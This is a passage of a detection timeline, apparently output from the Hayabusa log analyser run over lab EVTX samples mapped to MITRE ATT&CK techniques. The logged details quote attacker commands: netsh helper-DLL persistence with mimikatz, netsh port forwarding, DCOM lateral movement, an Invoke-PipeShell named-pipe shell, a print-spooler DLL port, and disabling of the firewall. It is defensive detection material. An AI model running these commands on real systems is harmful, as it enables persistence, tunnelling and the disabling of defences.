Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-21 20:43:22.562 +00:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-21 20:43:49.345 +00:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-21 20:43:50.131 +00:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-21 20:43:50.607 +00:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-21 20:43:50.866 +00:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 21:56:57.685 +00:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-22 21:57:11.842 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh add helper mimikatz.exe | Path: C:\Windows\System32\netsh.exe | PID: 0xd28 | User: admmig | LID: 0x75494,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-22 21:57:11.842 +00:00,fs01.offsec.lan,4688,high,PrivEsc,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation_builtin/proc_creation_win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-26 13:02:27.149 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:27.149 +00:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:27.155 +00:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:27.155 +00:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:29.726 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:29.726 +00:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:29.734 +00:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:29.734 +00:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:34.373 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:34.375 +00:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:34.379 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:34.379 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 13:02:34.380 +00:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 20:24:46.570 +00:00,rootdc1.offsec.lan,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-05-26 20:24:46.570 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-05-27 19:30:47.965 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-27 19:30:47.966 +00:00,jump01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(""MMC20.Application.1"",""fs01""))",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-27 19:30:47.966 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(""MMC20.Application.1"",""fs01""))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-27 19:30:48.169 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-27 19:30:48.170 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-27 19:30:48.172 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-06-01 14:06:34.542 +00:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: WADGUtilityAccount | SID: S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 14:08:21.225 +00:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: elie | SID: S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 14:09:38.437 +00:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \Microsoft\SynchronizeTimeZone | Content: 2021-06-01T16:09:38.3707854 OFFSEC\admmig \Microsoft\SynchronizeTimeZone 2021-06-01T16:09:35.8747701 true 1 LeastPrivilege OFFSEC\admmig InteractiveToken IgnoreNew true true true false false PT10M PT1H true false true true false false false P3D 7 adf | User: admmig | LID: 0x46b7b4",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-03 12:17:56.988 +00:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:17:58.582 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh I p a v l=8001 listena=0.0.0.0 connectp=3389 c=1.1.1.1 | Path: C:\Windows\System32\netsh.exe | PID: 0x578 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:17:58.582 +00:00,fs01.offsec.lan,4688,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation_builtin/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:17:58.582 +00:00,fs01.offsec.lan,4688,high,LatMov | Evas | C2,Netsh RDP Port Forwarding,,rules/sigma/process_creation_builtin/proc_creation_win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:18:04.312 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=80 | Path: C:\Windows\System32\netsh.exe | PID: 0x1048 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:18:04.312 +00:00,fs01.offsec.lan,4688,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation_builtin/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:18:06.940 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy reset | Path: C:\Windows\System32\netsh.exe | PID: 0x46c | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:18:12.941 +00:00,fs01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 12:18:12.942 +00:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 13:05:20.242 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:05:40.097 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:05:40.098 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:05:59.812 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:06.124 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:06.125 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Invoke-PipeShell -mode client -server localhost -aeskey aaaabbbbccccdddd -pipe eventlog_svc -i -timeout 1000,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:06.151 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IO.Pipes.NamedPipeClientStream"" ParameterBinding(New-Object): name=""ArgumentList""; value=""localhost, eventlog_svc, InOut, None, Impersonation""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:06.161 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,"] Waiting for client..`n"" $PipeObject.WaitForConnection() } else { try { # Add a 1s time-out in case the server is not live $PipeObject.Connect($timeout) } catch { echo ""[!] Server pipe not available!"" Return } } $PipeReader = $PipeWriter = $null $PipeReader = new-object System.IO.StreamReader($PipeObject) $PipeWriter = new-object System.IO.StreamWriter($PipeObject) $PipeWriter.AutoFlush = $true Initialize-Session }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:07.154 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Output): ""Write-Output"" ParameterBinding(Write-Output): name=""InputObject""; value=""[!] Server pipe not available!""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:07.154 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""+----------------------------------- | Host Name : JUMP01 | Named Pipe : eventlog_svc | AES Key : aaaabbbbccccdddd | Timeout : 1000 +-----------------------------------"" ParameterBinding(Out-Default): name=""InputObject""; value=""[!] Server pipe not available!""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:07.156 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:07.157 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:27.069 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:27.070 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Invoke-PipeShell -mode client -server localhost -aeskey aaaabbbbccccdddd -pipe eventlog_svc -timeout 1000 -c ls,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:27.073 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IO.Pipes.NamedPipeClientStream"" ParameterBinding(New-Object): name=""ArgumentList""; value=""localhost, eventlog_svc, InOut, None, Impersonation""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:28.071 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Output): ""Write-Output"" ParameterBinding(Write-Output): name=""InputObject""; value=""[!] Server pipe not available!""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:28.072 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""+----------------------------------- | Host Name : JUMP01 | Named Pipe : eventlog_svc | AES Key : aaaabbbbccccdddd | Timeout : 1000 +-----------------------------------"" ParameterBinding(Out-Default): name=""InputObject""; value=""[!] Server pipe not available!""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 17:42:33.379 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Resolve-Path): ""Resolve-Path"" ParameterBinding(Resolve-Path): name=""ErrorAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""WarningAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""InformationAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""Verbose""; value=""False"" ParameterBinding(Resolve-Path): name=""Debug""; value=""False"" ParameterBinding(Resolve-Path): name=""Path""; value=""Net*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-03 17:42:35.914 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-03 17:42:35.915 +00:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-PrinterPort -Name .\NetshHelperBeacon.dll,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-03 17:42:35.939 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-PrinterPort): ""Add-PrinterPort"" ParameterBinding(Add-PrinterPort): name=""Name""; value="".\NetshHelperBeacon.dll"" ParameterBinding(Add-PrinterPort): name=""ComputerName""; value="""" ParameterBinding(Add-PrinterPort): name=""HostName""; value="""" ParameterBinding(Add-PrinterPort): name=""PrinterName""; value="""" ParameterBinding(Add-PrinterPort): name=""PrinterHostAddress""; value="""" ParameterBinding(Add-PrinterPort): name=""PortNumber""; value=""0"" ParameterBinding(Add-PrinterPort): name=""SNMP""; value=""0"" ParameterBinding(Add-PrinterPort): name=""SNMPCommunity""; value="""" ParameterBinding(Add-PrinterPort): name=""LprHostAddress""; value="""" ParameterBinding(Add-PrinterPort): name=""LprQueueName""; value="""" ParameterBinding(Add-PrinterPort): name=""LprByteCounting""; value=""False"" ParameterBinding(Add-PrinterPort): name=""ThrottleLimit""; value=""0"" ParameterBinding(Add-PrinterPort): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-03 17:42:35.939 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-03 18:34:12.671 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-03 18:34:12.672 +00:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 